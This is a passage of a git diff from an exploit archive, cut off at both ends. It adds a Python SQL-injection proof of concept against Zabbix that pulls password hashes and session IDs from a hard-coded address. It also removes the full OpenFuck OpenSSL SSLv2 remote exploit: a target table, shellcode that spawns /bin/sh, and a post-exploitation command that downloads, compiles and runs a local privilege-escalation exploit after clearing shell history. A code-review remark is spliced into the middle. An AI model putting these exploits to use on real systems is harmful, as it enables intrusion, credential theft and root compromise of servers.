char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)" + session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)" + password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~") + if(password): + print '[+]Username~Password : %s' % password + else: + print '[-]Get Password Failed' + session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~") + if(session_id): + print "[+]Session_id:%s" % 
session_id + else: + print "[-]Get Session id Failed" + print '\n' + +def main(): + print '=' * 70 + print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc' + print '\t\t Author:Zzzians(Zzzians@gmail.com)' + print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82' + print '\t\t\t Time:2016-08-20\n' + urls = ["http://10.15.5.86"] + ids = [1,2] + for url in urls: + if url[-1] != '/': url += '/' + print '='*25 + url + '='*25 + for userid in ids: + exploit(url,userid) +main() diff --git a/platforms/unix/remote/21671.c b/platforms/unix/remote/21671.c index 345ead72f..1513b6692 100755 --- a/platforms/unix/remote/21671.c +++ b/platforms/unix/remote/21671.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/5363/info A buffer-overflow vulnerability has been reported in some versions of OpenSSL. @@ -5,6 +6,7 @@ A buffer-overflow vulnerability has been reported in some versions of OpenSSL. The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition. ***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available. +*/ /* * VERY PRIV8 spabam SPAX@zone-h.org diff --git a/platforms/unix/remote/21672.c b/platforms/unix/remote/21672.c deleted file mode 100755 index 1612d8af0..000000000 --- a/platforms/unix/remote/21672.c +++ /dev/null 
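Review bot: `main()` is called unconditionally on the last line of the new 40353.py, so importing the file in a triage or indexing pipeline immediately sends requests to the address hard-coded in `urls`. The entry point should be guarded with `if __name__ == "__main__":` followed by an indented `main()`. The `# -*- coding: utf_8 -*-` declaration sits on line 11 of the file, and Python only honours an encoding declaration on the first or second line, so it has no effect there. `sys` and `os` are imported but never used in the hunk. The `print payload` line carries the comment `#Uncomment this to see details` although it is not commented out, so the comment and the behaviour disagree.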
@@ -1,1303 +0,0 @@ -source: http://www.securityfocus.com/bid/5363/info - -A buffer-overflow vulnerability has been reported in some versions of OpenSSL. - -The issue occurs in the handling of the client key value during the negotiation of the SSLv2 protocol. A malicious client may be able to exploit this vulnerability to execute arbitrary code as the vulnerable server process or possibly to create a denial-of-service condition. - -***UPDATE: A worm that likely exploits this vulnerability has been discovered propagating in the wild. Additionally, this code includes peer-to-peer and distributed denial-of-service capabilities. There have been numerous reports of intrusions in Europe. It is not yet confirmed whether this vulnerability is in OpenSSL, mod_ssl, or another component. Administrators are advised to upgrade to the most recent versions or to disable Apache, if possible, until more information is available. - -/* - * OF version r00t VERY PRIV8 spabam - * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto - * objdump -R /usr/sbin/httpd|grep free to get more targets - * #hackarena irc.brasnet.org - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include -#include -#include -#include - -/* update this if you add architectures */ -#define MAX_ARCH 138 - -struct archs { - char* desc; - int func_addr; /* objdump -R /usr/sbin/httpd | grep free */ -} architectures[] = { - - { - "Caldera OpenLinux (apache-1.3.26)", - 0x080920e0 - }, - { - "Cobalt Sun 6.0 (apache-1.3.12)", - 0x8120f0c - }, - { - "Cobalt Sun 6.0 (apache-1.3.20)", - 0x811dcb8 - }, - { - "Cobalt Sun x (apache-1.3.26)", - 0x8123ac3 - }, - { - "Cobalt Sun x Fixed2 (apache-1.3.26)", - 0x81233c3 - }, - { - "Conectiva 4 (apache-1.3.6)", - 0x08075398 - }, - { - "Conectiva 4.1 (apache-1.3.9)", - 0x0808f2fe - }, - { - "Conectiva 6 (apache-1.3.14)", - 0x0809222c - }, - { - "Conectiva 7 (apache-1.3.12)", - 0x0808f874 - }, - { - "Conectiva 7 (apache-1.3.19)", - 
0x08088aa0 - }, - { - "Conectiva 7/8 (apache-1.3.26)", - 0x0808e628 - }, - { - "Conectiva 8 (apache-1.3.22)", - 0x0808b2d0 - }, - { - "Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)", - 0x08095264 - }, - { - "Debian GNU Linux (apache_1.3.19-1)", - 0x080966fc - }, - { - "Debian GNU Linux (apache_1.3.22-2)", - 0x08096aac - }, - { - "Debian GNU Linux (apache-1.3.22-2.1)", - 0x08083828 - }, - { - "Debian GNU Linux (apache-1.3.22-5)", - 0x08083728 - }, - { - "Debian GNU Linux (apache_1.3.23-1)", - 0x08085de8 - }, - { - "Debian GNU Linux (apache_1.3.24-2.1)", - 0x08087d08 - }, - { "Debian Linux GNU Linux 2 (apache_1.3.24-2.1)", - 0x080873ac - }, - { - "Debian GNU Linux (apache_1.3.24-3)", - 0x08087d68 - }, - { - "Debian GNU Linux (apache-1.3.26-1)", - 0x0080863c4 - }, - { - "Debian GNU Linux 3.0 Woody (apache-1.3.26-1)", - 0x080863cc - }, - { "Debian GNU Linux (apache-1.3.27)", - 0x0080866a3 - }, - - -{ "FreeBSD (apache-1.3.9)", 0xbfbfde00 }, -{ "FreeBSD (apache-1.3.11)", 0x080a2ea8 }, -{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7f58 }, -{ "FreeBSD (apache-1.3.12.1.40)", 0x080a0ec0 }, -{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7e7c }, -{ "FreeBSD (apache-1.3.12.1.40_1)", 0x080a7f18 }, -{ "FreeBSD (apache-1.3.12)", 0x0809bd7c }, -{ "FreeBSD (apache-1.3.14)", 0xbfbfdc00 }, -{ "FreeBSD (apache-1.3.14)", 0x080ab68c }, -{ "FreeBSD (apache-1.3.14)", 0x0808c76c }, -{ "FreeBSD (apache-1.3.14)", 0x080a3fc8 }, -{ "FreeBSD (apache-1.3.14)", 0x080ab6d8 }, -{ "FreeBSD (apache-1.3.17_1)", 0x0808820c }, -{ "FreeBSD (apache-1.3.19)", 0xbfbfdc00 }, -{ "FreeBSD (apache-1.3.19_1)", 0x0808c96c }, -{ "FreeBSD (apache-1.3.20)", 0x0808cb70 }, -{ "FreeBSD (apache-1.3.20)", 0xbfbfc000 }, -{ "FreeBSD (apache-1.3.20+2.8.4)", 0x0808faf8 }, -{ "FreeBSD (apache-1.3.20_1)", 0x0808dfb4 }, -{ "FreeBSD (apache-1.3.22)", 0xbfbfc000 }, -{ "FreeBSD (apache-1.3.22_7)", 0x0808d110 }, -{ "FreeBSD (apache_fp-1.3.23)", 0x0807c5f8 }, -{ "FreeBSD (apache-1.3.24_7)", 0x0808f8b0 }, -{ "FreeBSD (apache-1.3.24+2.8.8)", 
0x080927f8 }, -{ "FreeBSD 4.6.2-Release-p6 (apache-1.3.26)", 0x080c432c }, -{ "FreeBSD 4.6-Realease (apache-1.3.26)", 0x0808fdec }, -{ "FreeBSD (apache-1.3.27)", 0x080902e4 }, - - - { - "Gentoo Linux (apache-1.3.24-r2)", - 0x08086c34 - }, - { - "Linux Generic (apache-1.3.14)", - 0xbffff500 - }, - { - "Mandrake Linux X.x (apache-1.3.22-10.1mdk)", - 0x080808ab - }, - { - "Mandrake Linux 7.1 (apache-1.3.14-2)", - 0x0809f6c4 - }, - { - "Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)", - 0x0809d233 - }, - { - "Mandrake Linux 7.2 (apache-1.3.14-2mdk)", - 0x0809f6ef - }, - { - "Mandrake Linux 7.2 (apache-1.3.14) 2", - 0x0809d6c4 - }, - { - "Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)", - 0x0809ccde - }, - { - "Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)", - 0x0809ce14 - }, - { - "Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)", - 0x0809d262 - }, - { - "Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)", - 0x08083545 - }, - { - "Mandrake Linux 8.0 (apache-1.3.19-3)", - 0x0809ea98 - }, - { - "Mandrake Linux 8.1 (apache-1.3.20-3)", - 0x0809e97c - }, - { - "Mandrake Linux 8.2 (apache-1.3.23-4)", - 0x08086580 - }, - { "Mandrake Linux 8.2 #2 (apache-1.3.23-4)", - 0x08086484 - }, - { "Mandrake Linux 8.2 (apache-1.3.24)", - 0x08086665 - }, - - { "Mandrake Linux 9 (apache-1.3.26)", - 0x0808b864 - }, - { - "RedHat Linux ?.? 
GENERIC (apache-1.3.12-1)", - 0x0808c0f4 - }, - { - "RedHat Linux TEST1 (apache-1.3.12-1)", - 0x0808c0f4 - }, - { - "RedHat Linux TEST2 (apache-1.3.12-1)", - 0x0808c0f4 - }, - { - "RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)", - 0x080d2c35 - }, - { - "RedHat Linux 4.2 (apache-1.1.3-3)", - 0x08065bae - }, - { - "RedHat Linux 5.0 (apache-1.2.4-4)", - 0x0808c82c - }, - { - "RedHat Linux 5.1-Update (apache-1.2.6)", - 0x08092a45 - }, - { - "RedHat Linux 5.1 (apache-1.2.6-4)", - 0x08092c2d - }, - { - "RedHat Linux 5.2 (apache-1.3.3-1)", - 0x0806f049 - }, - { - "RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)", - 0x0808e4d8 - }, - { - "RedHat Linux 6.0 (apache-1.3.6-7)", - 0x080707ec - }, - { - "RedHat Linux 6.0 (apache-1.3.6-7)", - 0x080707f9 - }, - { - "RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)", - 0x0808fd52 - }, - { - "RedHat Linux 6.0 Update (apache-1.3.24)", - 0x80acd58 - }, - { - "RedHat Linux 6.1 (apache-1.3.9-4)1", - 0x0808ccc4 - }, - { - "RedHat Linux 6.1 (apache-1.3.9-4)2", - 0x0808ccdc - }, - { - "RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)", - 0x0808fd5d - }, - { - "RedHat Linux 6.1-fp2000 (apache-1.3.26)", - 0x082e6fcd - }, - { - "RedHat Linux 6.2 (apache-1.3.12-2)1", - 0x0808f689 - }, - { - "RedHat Linux 6.2 (apache-1.3.12-2)2", - 0x0808f614 - }, - { - "RedHat Linux 6.2 mod(apache-1.3.12-2)3", - 0xbffff94c - }, - - { - "RedHat Linux 6.2 update (apache-1.3.22-5.6)1", - 0x0808f9ec - }, - { - "RedHat Linux 6.2-Update (apache-1.3.22-5.6)2", - 0x0808f9d4 - }, - { - "Redhat Linux 7.x (apache-1.3.22)", - 0x0808400c - }, - { - "RedHat Linux 7.x (apache-1.3.26-1)", - 0x080873bc - }, - { "RedHat Linux 7.x (apache-1.3.27)", - 0x08087221 - }, - { - "RedHat Linux 7.0 (apache-1.3.12-25)1", - 0x0809251c - }, - { - "RedHat Linux 7.0 (apache-1.3.12-25)2", - 0x0809252d - }, - { - "RedHat Linux 7.0 (apache-1.3.14-2)", - 0x08092b98 - }, - { - "RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)", - 0x08084358 - }, - { - "RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)", - 
0x0808438c - }, - { - "RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)", - 0x08086e41 - }, - { - "RedHat Linux 7.1 (apache-1.3.19-5)1", - 0x0809af8c - }, - { - "RedHat Linux 7.1 (apache-1.3.19-5)2", - 0x0809afd9 - }, - { - "RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)", - 0x0808438c - }, - { - "RedHat Linux 7.1-Update (1.3.22-5.7.1)", - 0x08084389 - }, - { - "RedHat Linux 7.1 (apache-1.3.22-src)", - 0x0816021c - }, - { - "RedHat Linux 7.1-Update (1.3.27-1.7.1)", - 0x08086ec89 - }, - { - "RedHat Linux 7.2 (apache-1.3.20-16)1", - 0x080994e5 - }, - { - "RedHat Linux 7.2 (apache-1.3.20-16)2", - 0x080994d4 - }, - { - "RedHat Linux 7.2-Update (apache-1.3.22-6)", - 0x08084045 - }, - { - "RedHat Linux 7.2 (apache-1.3.24)", - 0x80b0938 - }, - { - "RedHat Linux 7.2 (apache-1.3.26)", - 0x08161c16 - }, - { - "RedHat Linux 7.2 (apache-1.3.26-snc)", - 0x8161c14 - }, - { - - "Redhat Linux 7.2 (apache-1.3.26 w/PHP)1", - 0x08269950 - }, - { - "Redhat Linux 7.2 (apache-1.3.26 w/PHP)2", - 0x08269988 - }, - { - "RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)", - 0x08086af9 - }, - { - "RedHat Linux 7.3 (apache-1.3.23-11)1", - 0x0808528c - }, - { - "RedHat Linux 7.3 (apache-1.3.23-11)2", - 0x0808525f - }, - { - "RedHat Linux 7.3 (apache-1.3.27)", - 0x080862e4 - }, - { "RedHat Linux 8.0 (apache-1.3.27)", - 0x08084c1c - }, - { "RedHat Linux 8.0-second (apache-1.3.27)", - 0x0808151e - }, - { "RedHat Linux 8.0 (apache-2.0.40)", - 0x08092fa4 - }, - { - "Slackware Linux 4.0 (apache-1.3.6)", - 0x08088130 - }, - { - "Slackware Linux 7.0 (apache-1.3.9)", - 0x080a7fc0 - }, - { - "Slackware Linux 7.0 (apache-1.3.26)", - 0x083d37fc - }, - { "Slackware 7.0 (apache-1.3.26)2", - 0x083d2232 - }, - { - "Slackware Linux 7.1 (apache-1.3.12)", - 0x080a86a4 - }, - { - "Slackware Linux 8.0 (apache-1.3.20)", - 0x080ae67c - }, - { - "Slackware Linux 8.1 (apache-1.3.24)", - 0x080b0c60 - }, - { - "Slackware Linux 8.1 (apache-1.3.26)", - 0x080b2100 - }, - - { - "Slackware Linux 8.1-stable (apache-1.3.26)", - 
0x080b0c60 - }, - { "Slackware Linux (apache-1.3.27)", - 0x080b1a3a - }, - { - "SuSE Linux 7.0 (apache-1.3.12)", - 0x0809f54c - }, - { - "SuSE Linux 7.1 (apache-1.3.17)", - 0x08099984 - }, - { - "SuSE Linux 7.2 (apache-1.3.19)", - 0x08099ec8 - }, - { - "SuSE Linux 7.3 (apache-1.3.20)", - 0x08099da8 - }, - { - "SuSE Linux 8.0 (apache-1.3.23)", - 0x08086168 - }, - { - "SUSE Linux 8.0 (apache-1.3.23-120)", - 0x080861c8 - }, - { - "SuSE Linux 8.0 (apache-1.3.23-137)", - 0x080861c8 - }, -/* this one unchecked cause require differend shellcode */ - { - "Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)", - 0xfd42630 - }, - -}; - -extern int errno; - -int cipher; -int ciphers; - -/* the offset of the local port from be beginning of the overwrite next chunk buffer */ -#define FINDSCKPORTOFS 208 + 12 + 46 - -unsigned char overwrite_session_id_length[] = - "AAAA" /* int master key length; */ - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */ - "\x70\x00\x00\x00"; /* unsigned int session id length; */ - -unsigned char overwrite_next_chunk[] = - "AAAA" /* int master key length; */ - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */ - "AAAA" /* unsigned int session id length; */ - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */ - "AAAA" /* unsigned int sid ctx length; */ - "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */ - "AAAA" /* int not resumable; */ - "\x00\x00\x00\x00" /* struct sess cert st *sess cert; */ - "\x00\x00\x00\x00" /* X509 *peer; */ - "AAAA" /* long verify result; */ - "\x01\x00\x00\x00" /* int references; */ - "AAAA" /* int timeout; */ - "AAAA" /* int time */ - "AAAA" /* int compress meth; */ - "\x00\x00\x00\x00" /* SSL CIPHER *cipher; */ - "AAAA" /* unsigned long cipher id; */ - "\x00\x00\x00\x00" /* STACK OF(SSL CIPHER) *ciphers; */ - 
"\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO EX DATA ex data; */ - "AAAAAAAA" /* struct ssl session st *prev,*next; */ - - "\x00\x00\x00\x00" /* Size of previous chunk */ - "\x11\x00\x00\x00" /* Size of chunk, in bytes */ - "fdfd" /* Forward and back pointers */ - "bkbk" - "\x10\x00\x00\x00" /* Size of previous chunk */ - "\x10\x00\x00\x00" /* Size of chunk, PREV INUSE is set */ - -/* shellcode start */ - "\xeb\x0a\x90\x90" /* jump 10 bytes ahead, land at shellcode */ - "\x90\x90\x90\x90" - "\x90\x90\x90\x90" /* this is overwritten with FD by the unlink macro */ - -/* 72 bytes findsckcode by LSD-pl */ - "\x31\xdb" /* xorl %ebx,%ebx */ - "\x89\xe7" /* movl %esp,%edi */ - "\x8d\x77\x10" /* leal 0x10(%edi),%esi */ - "\x89\x77\x04" /* movl %esi,0x4(%edi) */ - "\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */ - "\x89\x4f\x08" /* movl %ecx,0x8(%edi) */ - "\xb3\x10" /* movb $0x10,%bl */ - "\x89\x19" /* movl %ebx,(%ecx) */ - "\x31\xc9" /* xorl %ecx,%ecx */ - "\xb1\xff" /* movb $0xff,%cl */ - "\x89\x0f" /* movl %ecx,(%edi) */ - "\x51" /* pushl %ecx */ - "\x31\xc0" /* xorl %eax,%eax */ - "\xb0\x66" /* movb $0x66,%al */ - "\xb3\x07" /* movb $0x07,%bl */ - "\x89\xf9" /* movl %edi,%ecx */ - "\xcd\x80" /* int $0x80 */ - "\x59" /* popl %ecx */ - "\x31\xdb" /* xorl %ebx,%ebx */ - "\x39\xd8" /* cmpl %ebx,%eax */ - "\x75\x0a" /* jne */ - "\x66\xb8\x12\x34" /* movw $0x1234,%bx */ - "\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */ - "\x74\x02" /* je */ - "\xe2\xe0" /* loop */ - "\x89\xcb" /* movl %ecx,%ebx */ - "\x31\xc9" /* xorl %ecx,%ecx */ - "\xb1\x03" /* movb $0x03,%cl */ - "\x31\xc0" /* xorl %eax,%eax */ - "\xb0\x3f" /* movb $0x3f,%al */ - "\x49" /* decl %ecx */ - "\xcd\x80" /* int $0x80 */ - "\x41" /* incl %ecx */ - "\xe2\xf6" /* loop */ - -/* 10 byte setresuid(0,0,0); by core */ - "\x31\xc9" /* xor %ecx,%ecx */ - "\xf7\xe1" /* mul %ecx,%eax */ - "\x51" /* push %ecx */ - "\x5b" /* pop %ebx */ - "\xb0\xa4" /* mov $0xa4,%al */ - "\xcd\x80" /* int $0x80 */ - - -/* bigger shellcode added by 
spabam */ - -/* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x2F\x62\x69" - "\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\xD2\xCD\x80" -*/ - - -/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */ - "\x31\xc0" /* xorl %eax,%eax */ - "\x50" /* pushl %eax */ - "\x68""//sh" /* pushl $0x68732f2f */ - "\x68""/bin" /* pushl $0x6e69622f */ - "\x89\xe3" /* movl %esp,%ebx */ - "\x50" /* pushl %eax */ - "\x53" /* pushl %ebx */ - "\x89\xe1" /* movl %esp,%ecx */ - "\x99" /* cdql */ - "\xb0\x0b" /* movb $0x0b,%al */ - "\xcd\x80"; /* int $0x80 */ - -/* read and write buffer*/ -#define BUFSIZE 16384 - -/* hardcoded protocol stuff */ -#define CHALLENGE_LENGTH 16 -#define RC4_KEY_LENGTH 16 /* 128 bits */ -#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2) - -/* straight from the openssl source */ -#define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2) -#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2) - -/* we keep all SSL2 state in this structure */ -typedef struct { - int sock; - - /* client stuff */ - unsigned char challenge[CHALLENGE_LENGTH]; - unsigned char master_key[RC4_KEY_LENGTH]; - unsigned char key_material[RC4_KEY_MATERIAL_LENGTH]; - - /* connection id - returned by the server */ - int conn_id_length; - unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH]; - - /* server certificate */ - X509 *x509; - - /* session keys */ - unsigned char* read_key; - unsigned char* write_key; - RC4_KEY* rc4_read_key; - RC4_KEY* rc4_write_key; - - /* sequence numbers, used for MAC calculation */ - int read_seq; - int write_seq; - - /* set to 1 when the SSL2 handshake is complete */ - int encrypted; -} ssl_conn; - -#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n" -#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n" - -long getip(char *hostname) { - struct hostent *he; - long 
ipaddr; - - if ((ipaddr = inet_addr(hostname)) < 0) { - if ((he = gethostbyname(hostname)) == NULL) { - perror("gethostbyname()"); - exit(-1); - } - memcpy(&ipaddr, he->h_addr, he->h_length); - } - return ipaddr; -} - -/* mixter's code w/enhancements by core */ - -int sh(int sockfd) { - char snd[1024], rcv[1024]; - fd_set rset; - int maxfd, n; - - /* Priming commands */ - strcpy(snd, COMMAND1 "\n"); - write(sockfd, snd, strlen(snd)); - - strcpy(snd, COMMAND2 "\n"); - write(sockfd, snd, strlen(snd)); - - /* Main command loop */ - for (;;) { - FD_SET(fileno(stdin), &rset); - FD_SET(sockfd, &rset); - - maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1; - select(maxfd, &rset, NULL, NULL, NULL); - - if (FD_ISSET(fileno(stdin), &rset)) { - bzero(snd, sizeof(snd)); - fgets(snd, sizeof(snd)-2, stdin); - write(sockfd, snd, strlen(snd)); - } - - if (FD_ISSET(sockfd, &rset)) { - bzero(rcv, sizeof(rcv)); - - if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) { - printf("Good Bye!\n"); - return 0; - } - - if (n < 0) { - perror("read"); - return 1; - } - - fputs(rcv, stdout); - fflush(stdout); /* keeps output nice */ - } - } /* for(;;) */ -} - -/* Returns the local port of a connected socket */ -int get_local_port(int sock) -{ - struct sockaddr_in s_in; - unsigned int namelen = sizeof(s_in); - - if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) { - printf("Can't get local port: %s\n", strerror(errno)); - exit(1); - } - - return s_in.sin_port; -} - -/* Connect to a host */ -int connect_host(char* host, int port) -{ - struct sockaddr_in s_in; - int sock; - - s_in.sin_family = AF_INET; - s_in.sin_addr.s_addr = getip(host); - s_in.sin_port = htons(port); - - if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) { - printf("Could not create a socket\n"); - exit(1); - } - - if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) { - printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno)); - exit(1); - } - - return sock; -} - -/* Create a new 
ssl conn structure and connect to a host */ -ssl_conn* ssl_connect_host(char* host, int port) -{ - ssl_conn* ssl; - - if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) { - printf("Can't allocate memory\n"); - exit(1); - } - - /* Initialize some values */ - ssl->encrypted = 0; - ssl->write_seq = 0; - ssl->read_seq = 0; - - ssl->sock = connect_host(host, port); - - return ssl; -} - -/* global buffer used by the ssl result() */ -char res_buf[30]; - -/* converts an SSL error code to a string */ -char* ssl_error(int code) { - switch (code) { - case 0x00: return "SSL2 PE UNDEFINED ERROR (0x00)"; - case 0x01: return "SSL2 PE NO CIPHER (0x01)"; - case 0x02: return "SSL2 PE NO CERTIFICATE (0x02)"; - case 0x04: return "SSL2 PE BAD CERTIFICATE (0x03)"; - case 0x06: return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)"; - default: - sprintf(res_buf, "%02x", code); - return res_buf; - } -} - -/* read len bytes from a socket. boring. */ -int read_data(int sock, unsigned char* buf, int len) -{ - int l; - int to_read = len; - - do { - if ((l = read(sock, buf, to_read)) < 0) { - printf("Error in read: %s\n", strerror(errno)); - exit(1); - } - to_read -= len; - } while (to_read > 0); - - return len; -} - -/* reads an SSL packet and decrypts it if necessery */ -int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size) -{ - int rec_len, padding; - - read_data(ssl->sock, buf, 2); - - if ((buf[0] & 0x80) == 0) { - /* three byte header */ - rec_len = ((buf[0] & 0x3f) << 8) | buf[1]; - read_data(ssl->sock, &buf[2], 1); - padding = (int)buf[2]; - } - else { - /* two byte header */ - rec_len = ((buf[0] & 0x7f) << 8) | buf[1]; - padding = 0; - } - - if ((rec_len <= 0) || (rec_len > buf_size)) { - printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len); - exit(1); - } - - read_data(ssl->sock, buf, rec_len); - - if (ssl->encrypted) { - if (MD5_DIGEST_LENGTH + padding >= rec_len) { - if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) { - /* the server didn't 
switch to encryption due to an error */ - return 0; - } - else { - printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len); - exit(1); - } - } - - /* decrypt the encrypted part of the packet */ - RC4(ssl->rc4_read_key, rec_len, buf, buf); - - /* move the decrypted message in the beginning of the buffer */ - rec_len = rec_len - MD5_DIGEST_LENGTH - padding; - memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len); - } - - if (buf[0] == SSL2_MT_ERROR) { - if (rec_len != 3) { - printf("Malformed server error message\n"); - exit(1); - } - else { - return 0; - } - } - - return rec_len; -} - -/* send an ssl packet, encrypting it if ssl->encrypted is set */ -void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len) -{ - unsigned char buf[BUFSIZE]; - unsigned char* p; - int tot_len; - MD5_CTX ctx; - int seq; - - - if (ssl->encrypted) - tot_len = rec_len + MD5_DIGEST_LENGTH; /* RC4 needs no padding */ - else - tot_len = rec_len; - - if (2 + tot_len > BUFSIZE) { - printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len); - exit(1); - } - - p = buf; - s2n(tot_len, p); - - buf[0] = buf[0] | 0x80; /* two byte header */ - - if (ssl->encrypted) { - /* calculate the MAC */ - seq = ntohl(ssl->write_seq); - - MD5_Init(&ctx); - MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH); - MD5_Update(&ctx, rec, rec_len); - MD5_Update(&ctx, &seq, 4); - MD5_Final(p, &ctx); - - p+=MD5_DIGEST_LENGTH; - - memcpy(p, rec, rec_len); - - /* encrypt the payload */ - RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]); - - } - else { - memcpy(p, rec, rec_len); - } - - send(ssl->sock, buf, 2 + tot_len, 0); - - /* the sequence number is incremented by both encrypted and plaintext packets -*/ - ssl->write_seq++; -} - -/* Send a CLIENT HELLO message to the server */ -void send_client_hello(ssl_conn *ssl) -{ - int i; - unsigned char buf[BUFSIZE] = - "\x01" /* client hello msg */ - - "\x00\x02" /* client version */ - "\x00\x18" /* cipher specs length */ - 
"\x00\x00" /* session id length */ - "\x00\x10" /* challenge length */ - - "\x07\x00\xc0\x05\x00\x80\x03\x00" /* cipher specs data */ - "\x80\x01\x00\x80\x08\x00\x80\x06" - "\x00\x40\x04\x00\x80\x02\x00\x80" - - ""; /* session id data */ - - /* generate CHALLENGE LENGTH bytes of challenge data */ - for (i = 0; i < CHALLENGE_LENGTH; i++) { - ssl->challenge[i] = (unsigned char) (rand() >> 24); - } - memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH); - - send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH); -} - -/* Get a SERVER HELLO response from the server */ -void get_server_hello(ssl_conn* ssl) -{ - unsigned char buf[BUFSIZE]; - unsigned char *p, *end; - int len; - int server_version, cert_length, cs_length, conn_id_length; - int found; - - if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) { - printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1]))); - exit(1); - } - if (len < 11) { - printf("get_server_hello: Packet too short (len = %d)\n", len); - exit(1); - } - - p = buf; - - if (*(p++) != SSL2_MT_SERVER_HELLO) { - printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]); - exit(1); - } - - if (*(p++) != 0) { - printf("get_server_hello: SESSION-ID-HIT is not 0\n"); - exit(1); - } - - if (*(p++) != 1) { - printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n"); - exit(1); - } - - n2s(p, server_version); - if (server_version != 2) { - printf("get_server_hello: Unsupported server version %d\n", server_version); - exit(1); - } - - n2s(p, cert_length); - n2s(p, cs_length); - n2s(p, conn_id_length); - - if (len != 11 + cert_length + cs_length + conn_id_length) { - printf("get_server_hello: Malformed packet size\n"); - exit(1); - } - - /* read the server certificate */ - ssl->x509 = NULL; - ssl->x509=d2i_X509(NULL,&p,(long)cert_length); - if (ssl->x509 == NULL) { - printf("get server hello: Cannot parse x509 certificate\n"); - exit(1); - } - - if (cs_length % 3 != 0) { - printf("get server hello: 
